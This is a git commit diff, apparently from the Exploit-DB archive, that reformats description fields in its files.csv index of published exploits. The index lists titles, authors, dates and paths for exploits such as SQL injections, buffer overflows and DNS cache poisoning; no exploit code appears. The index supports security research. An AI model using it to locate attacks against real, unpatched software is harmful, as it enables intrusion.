DB: 2015-07-13

Offensive Security 2015-07-13 05:02:34 +00:00
parent 5df0c9137c
commit de22c9ec44
14 changed files with 1475 additions and 1475 deletions

126
files.csv

@ -1119,7 +1119,7 @@ id,file,description,date,author,platform,type,port
1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0
1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0
1345,platforms/php/webapps/1345.php,"Xaraya <= 1.0.0 RC4 create() Denial of Service Exploit",2005-11-29,rgod,php,webapps,0 1345,platforms/php/webapps/1345.php,"Xaraya <= 1.0.0 RC4 create() Denial of Service Exploit",2005-11-29,rgod,php,webapps,0
1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0
1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0
1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0
1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0
@ -5714,10 +5714,10 @@ id,file,description,date,author,platform,type,port
6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow Exploit (Win32)",2008-07-18,Unohope,windows,remote,80 6100,platforms/windows/remote/6100.py,"Apache mod_jk 1.2.19 - Remote Buffer Overflow Exploit (Win32)",2008-07-18,Unohope,windows,remote,80
6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit",2008-07-19,"Joxean Koret",multiple,dos,0 6101,platforms/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit",2008-07-19,"Joxean Koret",multiple,dos,0
6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 (show.php) Remote SQL Injection Vulnerability",2008-07-20,Mr.SQL,php,webapps,0 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 (show.php) Remote SQL Injection Vulnerability",2008-07-20,Mr.SQL,php,webapps,0
6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0
6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
6105,platforms/asp/webapps/6105.pl,"HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0 6105,platforms/asp/webapps/6105.pl,"HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)",2008-07-21,"Guido Landi",windows,local,0 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (pl)",2008-07-21,"Guido Landi",windows,local,0
6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0 6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0
6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Remote Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Remote Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0
6109,platforms/cgi/webapps/6109.pl,"MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0 6109,platforms/cgi/webapps/6109.pl,"MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0
@ -5727,12 +5727,12 @@ id,file,description,date,author,platform,type,port
6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit",2008-07-21,ldma,php,webapps,0 6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit",2008-07-21,ldma,php,webapps,0
6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 (pid) Remote SQL Injection Vulnerability",2008-07-21,Cr@zy_King,php,webapps,0 6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 (pid) Remote SQL Injection Vulnerability",2008-07-21,Cr@zy_King,php,webapps,0
6115,platforms/php/webapps/6115.txt,"EZWebAlbum Insecure Cookie Handling Vulnerability",2008-07-21,"Virangar Security",php,webapps,0 6115,platforms/php/webapps/6115.txt,"EZWebAlbum Insecure Cookie Handling Vulnerability",2008-07-21,"Virangar Security",php,webapps,0
6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit",2008-07-22,"Guido Landi",windows,remote,0 6116,platforms/windows/remote/6116.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit",2008-07-22,"Guido Landi",windows,remote,0
6117,platforms/php/webapps/6117.txt,"youtube blog 0.1 (rfi/sql/XSS) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0 6117,platforms/php/webapps/6117.txt,"youtube blog 0.1 (rfi/sql/XSS) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0
6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0 6118,platforms/windows/remote/6118.pl,"IntelliTamper 2.07 - (server header) Remote Code Execution Exploit",2008-07-22,Koshi,windows,remote,0
6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll (default.asp catid) SQL Injection Vulnerability",2008-07-22,DreamTurk,asp,webapps,0 6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll (default.asp catid) SQL Injection Vulnerability",2008-07-22,DreamTurk,asp,webapps,0
6120,platforms/minix/dos/6120.txt,"minix 3.1.2a tty panic Local Denial of Service Vulnerability",2008-07-23,kokanin,minix,dos,0 6120,platforms/minix/dos/6120.txt,"minix 3.1.2a tty panic Local Denial of Service Vulnerability",2008-07-23,kokanin,minix,dos,0
6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit (c)",2008-07-23,r0ut3r,windows,remote,0 6121,platforms/windows/remote/6121.c,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow Exploit (c)",2008-07-23,r0ut3r,windows,remote,0
6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (meta)",2008-07-23,I)ruid,multiple,remote,0 6122,platforms/multiple/remote/6122.rb,"BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (meta)",2008-07-23,I)ruid,multiple,remote,0
6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (py)",2008-07-24,"Julien Desfossez",multiple,remote,0 6123,platforms/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning Flaw Exploit (py)",2008-07-24,"Julien Desfossez",multiple,remote,0
6124,platforms/windows/remote/6124.c,"Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0 6124,platforms/windows/remote/6124.c,"Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit",2008-07-24,callAX,windows,remote,0
@ -5806,7 +5806,7 @@ id,file,description,date,author,platform,type,port
6192,platforms/php/webapps/6192.txt,"k-links directory (sql/XSS) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0 6192,platforms/php/webapps/6192.txt,"k-links directory (sql/XSS) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0
6193,platforms/php/webapps/6193.txt,"E-Store Kit- <= 2 PayPal Edition - (pid) SQL Injection Vulnerability",2008-08-02,Mr.SQL,php,webapps,0 6193,platforms/php/webapps/6193.txt,"E-Store Kit- <= 2 PayPal Edition - (pid) SQL Injection Vulnerability",2008-08-02,Mr.SQL,php,webapps,0
6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0 6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0
6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit",2008-08-03,r0ut3r,windows,remote,0 6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 - (imgsrc) Remote Buffer Overflow Exploit",2008-08-03,r0ut3r,windows,remote,0
6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit",2008-08-03,crit3rion,hardware,dos,0 6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit",2008-08-03,crit3rion,hardware,dos,0
6199,platforms/php/webapps/6199.pl,"Joomla Component EZ Store Remote Blind SQL Injection Exploit",2008-08-03,His0k4,php,webapps,0 6199,platforms/php/webapps/6199.pl,"Joomla Component EZ Store Remote Blind SQL Injection Exploit",2008-08-03,His0k4,php,webapps,0
6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 (index.php page) Local File Inclusion Vulnerability",2008-08-03,SirGod,php,webapps,0 6200,platforms/php/webapps/6200.txt,"syzygyCMS 0.3 (index.php page) Local File Inclusion Vulnerability",2008-08-03,SirGod,php,webapps,0
@ -5833,7 +5833,7 @@ id,file,description,date,author,platform,type,port
6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final (startup.php) Remote File Inclusion Vulnerability",2008-08-10,CraCkEr,php,webapps,0 6224,platforms/php/webapps/6224.txt,"txtSQL 2.2 Final (startup.php) Remote File Inclusion Vulnerability",2008-08-10,CraCkEr,php,webapps,0
6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 Insecure Cookie Handling Vulnerability",2008-08-10,"Virangar Security",php,webapps,0 6225,platforms/php/webapps/6225.txt,"PHP-Ring Webring System 0.9.1 Insecure Cookie Handling Vulnerability",2008-08-10,"Virangar Security",php,webapps,0
6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-08-10,"Virangar Security",php,webapps,0 6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-08-10,"Virangar Security",php,webapps,0
6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0
6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 (image.php id) SQL Injection Vulnerability",2008-08-10,nuclear,php,webapps,0 6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 (image.php id) SQL Injection Vulnerability",2008-08-10,nuclear,php,webapps,0
6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2008-08-11,"Simon Ryeo",multiple,remote,0 6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal Vulnerability",2008-08-11,"Simon Ryeo",multiple,remote,0
6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 (bannerclick.php adid) SQL Injection Vulnerability",2008-08-11,"Hussin X",php,webapps,0 6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 (bannerclick.php adid) SQL Injection Vulnerability",2008-08-11,"Hussin X",php,webapps,0
@ -5844,7 +5844,7 @@ id,file,description,date,author,platform,type,port
6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 (img) Remote File Disclosure Vulnerability",2008-08-13,JIKO,php,webapps,0 6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 (img) Remote File Disclosure Vulnerability",2008-08-13,JIKO,php,webapps,0
6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0 6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0
6237,platforms/multiple/dos/6237.txt,"Ventrilo <= 3.0.2 - NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0 6237,platforms/multiple/dos/6237.txt,"Ventrilo <= 3.0.2 - NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0
6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit",2008-08-13,kralor,windows,remote,0 6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow Exploit",2008-08-13,kralor,windows,remote,0
6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0 6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0
6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote BoF Exploit PoC (0day)",2008-08-13,h07,windows,dos,0 6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote BoF Exploit PoC (0day)",2008-08-13,h07,windows,dos,0
6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BoF PoC",2008-08-14,Symantec,windows,dos,0 6244,platforms/windows/dos/6244.js,"Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BoF PoC",2008-08-14,Symantec,windows,dos,0
@ -7122,7 +7122,7 @@ id,file,description,date,author,platform,type,port
7579,platforms/php/webapps/7579.txt,"ClaSS <= 0.8.60 (export.php ftype) Local File Inclusion Vulnerability",2008-12-24,fuzion,php,webapps,0 7579,platforms/php/webapps/7579.txt,"ClaSS <= 0.8.60 (export.php ftype) Local File Inclusion Vulnerability",2008-12-24,fuzion,php,webapps,0
7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 (lang) Local File Inclusion Vulnerability",2008-12-24,fuzion,php,webapps,0 7580,platforms/php/webapps/7580.txt,"BloofoxCMS 0.3.4 (lang) Local File Inclusion Vulnerability",2008-12-24,fuzion,php,webapps,0
7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0 7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0
7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0
7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0 7583,platforms/windows/remote/7583.pl,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0
7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0
7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0 7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0
@ -7145,7 +7145,7 @@ id,file,description,date,author,platform,type,port
7605,platforms/php/webapps/7605.php,"TaskDriver <= 1.3 - Remote Change Admin Password Exploit",2008-12-29,cOndemned,php,webapps,0 7605,platforms/php/webapps/7605.php,"TaskDriver <= 1.3 - Remote Change Admin Password Exploit",2008-12-29,cOndemned,php,webapps,0
7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 Admin Bypass Change User Password Vulnerability",2008-12-29,R31P0l,php,webapps,0 7606,platforms/php/webapps/7606.txt,"FubarForum 1.6 Admin Bypass Change User Password Vulnerability",2008-12-29,R31P0l,php,webapps,0
7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit",2008-12-29,StAkeR,php,webapps,0 7607,platforms/php/webapps/7607.pl,"Ultimate PHP Board <= 2.2.1 (log inj) Privilege Escalation Exploit",2008-12-29,StAkeR,php,webapps,0
7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 (ProxyLogin) Local Stack Overflow Exploit",2008-12-29,His0k4,windows,local,0 7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow Exploit",2008-12-29,His0k4,windows,local,0
7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0 7609,platforms/asp/webapps/7609.txt,"Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0
7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal (deptdisplay.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0 7610,platforms/asp/webapps/7610.txt,"Sepcity Lawyer Portal (deptdisplay.asp ID) SQL Injection Vulnerability",2008-12-29,Osmanizim,asp,webapps,0
7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection Exploit",2008-12-29,s4avrd0w,php,webapps,0 7611,platforms/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection Exploit",2008-12-29,s4avrd0w,php,webapps,0
@ -7244,7 +7244,7 @@ id,file,description,date,author,platform,type,port
7704,platforms/php/webapps/7704.pl,"Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit",2009-01-08,darkjoker,php,webapps,0 7704,platforms/php/webapps/7704.pl,"Pizzis CMS <= 1.5.1 (visualizza.php idvar) Blind SQL Injection Exploit",2009-01-08,darkjoker,php,webapps,0
7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit",2009-01-08,StAkeR,php,webapps,0 7705,platforms/php/webapps/7705.pl,"XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit",2009-01-08,StAkeR,php,webapps,0
7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext <= 1.2.0-RC1 mIRC script",2009-01-08,Phil,windows,remote,0 7706,platforms/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext <= 1.2.0-RC1 mIRC script",2009-01-08,Phil,windows,remote,0
7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) - Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0
7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - (.mp3) Local Heap Overflow PoC",2009-01-09,Houssamix,windows,dos,0 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - (.mp3) Local Heap Overflow PoC",2009-01-09,Houssamix,windows,dos,0
7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - (.asx) (HREF) Local Buffer Overflow PoC",2009-01-09,"aBo MoHaMeD",windows,dos,0 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - (.asx) (HREF) Local Buffer Overflow PoC",2009-01-09,"aBo MoHaMeD",windows,dos,0
7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service Exploit",2009-01-09,Skylined,windows,dos,0 7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service Exploit",2009-01-09,Skylined,windows,dos,0
@ -7671,7 +7671,7 @@ id,file,description,date,author,platform,type,port
8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0 8149,platforms/windows/remote/8149.txt,"EFS Easy Chat Server - (CSRF) Change Admin Pass Vulnerability",2009-03-03,Stack,windows,remote,0
8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability",2009-03-03,Pepelux,php,webapps,0 8150,platforms/php/webapps/8150.txt,"NovaBoard <= 1.0.1 (message) Persistent XSS Vulnerability",2009-03-03,Pepelux,php,webapps,0
8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability",2009-03-03,kecemplungkalen,php,webapps,0 8151,platforms/php/webapps/8151.txt,"Jogjacamp JProfile Gold (id_news) Remote SQL Injection Vulnerability",2009-03-03,kecemplungkalen,php,webapps,0
8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002) (Fast)",2009-03-04,"Ahmed Obied",windows,remote,0 8152,platforms/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption Exploit (MS09-002)",2009-03-04,"Ahmed Obied",windows,remote,0
8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)",2009-03-04,Dr4sH,windows,remote,80 8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)",2009-03-04,Dr4sH,windows,remote,80
8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure Vulnerability",2009-03-04,Stack,windows,remote,0 8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure Vulnerability",2009-03-04,Stack,windows,remote,0
8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0 8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0
@ -9077,7 +9077,7 @@ id,file,description,date,author,platform,type,port
9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0 9613,platforms/windows/remote/9613.py,"FTPShell Client 4.1 RC2 - Remote Buffer Overflow Exploit (univ)",2009-09-09,His0k4,windows,remote,0
9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0 9615,platforms/windows/remote/9615.jar,"Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit",2009-09-09,"Pierre Nogues",windows,remote,0
9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0 9617,platforms/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow & Null pointer Dereference Vulns",2009-09-09,"Core Security",windows,dos,0
9618,platforms/windows/local/9618.php,"Millenium MP3 Studio (pls/mpf/m3u) Local Universal BoF Exploits (SEH)",2009-09-09,hack4love,windows,local,0 9618,platforms/windows/local/9618.php,"Millenium MP3 Studio - (pls/mpf/m3u) Local Universal BoF Exploits (SEH)",2009-09-09,hack4love,windows,local,0
9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BoF (SEH)",2009-09-09,hack4love,windows,local,0 9619,platforms/windows/local/9619.pl,"jetAudio 7.1.9.4030 plus vx(asx/wax/wvx) Universal Local BoF (SEH)",2009-09-09,hack4love,windows,local,0
9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0 9620,platforms/windows/dos/9620.pl,"Media Player Classic 6.4.9 - (.mid) Integer Overflow PoC",2009-09-09,PLATEN,windows,dos,0
9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 - (Get Request) Denial of Service Vulnerability",2009-09-10,"Usman Saeed",windows,dos,0 9621,platforms/windows/dos/9621.txt,"Kolibri+ Webserver 2 - (Get Request) Denial of Service Vulnerability",2009-09-10,"Usman Saeed",windows,dos,0
@ -9275,8 +9275,8 @@ id,file,description,date,author,platform,type,port
9891,platforms/php/webapps/9891.txt,"Joomla Jshop SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0 9891,platforms/php/webapps/9891.txt,"Joomla Jshop SQL Injection",2009-10-23,"Don Tukulesto",php,webapps,0
9892,platforms/php/webapps/9892.txt,"Joomla Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0 9892,platforms/php/webapps/9892.txt,"Joomla Photo Blog alpha 3 - alpha 3a SQL Injection",2009-10-23,kaMtiEz,php,webapps,0
9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption PoC",2009-10-15,Skylined,windows,remote,80 9893,platforms/windows/remote/9893.txt,"Microsoft Internet Explorer 5/6/7 - Memory Corruption PoC",2009-10-15,Skylined,windows,remote,80
9894,platforms/windows/local/9894.txt,"Millenium MP3 Studio 2.0 m3u file BoF",2009-10-15,dellnull,windows,local,0 9894,platforms/windows/local/9894.txt,"Millenium MP3 Studio 2.0 - (m3u) BoF",2009-10-15,dellnull,windows,local,0
9895,platforms/windows/local/9895.txt,"Millenium MP3 Studio 2.0 mpf file BoF",2009-10-14,dellnull,windows,local,0 9895,platforms/windows/local/9895.txt,"Millenium MP3 Studio 2.0 - (mpf) BoF",2009-10-14,dellnull,windows,local,0
9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 BoF",2009-10-19,iM4n,windows,remote,80 9896,platforms/windows/remote/9896.txt,"MiniShare HTTP 1.5.5 BoF",2009-10-19,iM4n,windows,remote,80
9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0 9897,platforms/php/webapps/9897.txt,"Mongoose Web Server 2.8.0 Source Disclosure",2009-10-23,Dr_IDE,php,webapps,0
9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 Root folder disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0 9898,platforms/multiple/webapps/9898.txt,"Mura CMS 5.1 Root folder disclosure",2009-10-29,"Vladimir Vorontsov",multiple,webapps,0
@ -9478,7 +9478,7 @@ id,file,description,date,author,platform,type,port
10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0 10105,platforms/php/webapps/10105.txt,"Cifshanghai (chanpin_info.php) CMS SQL Injection",2009-11-16,ProF.Code,php,webapps,0
10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0 10106,platforms/windows/dos/10106.c,"Avast 4.8.1351.0 antivirus aswMon2.sys Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos,0
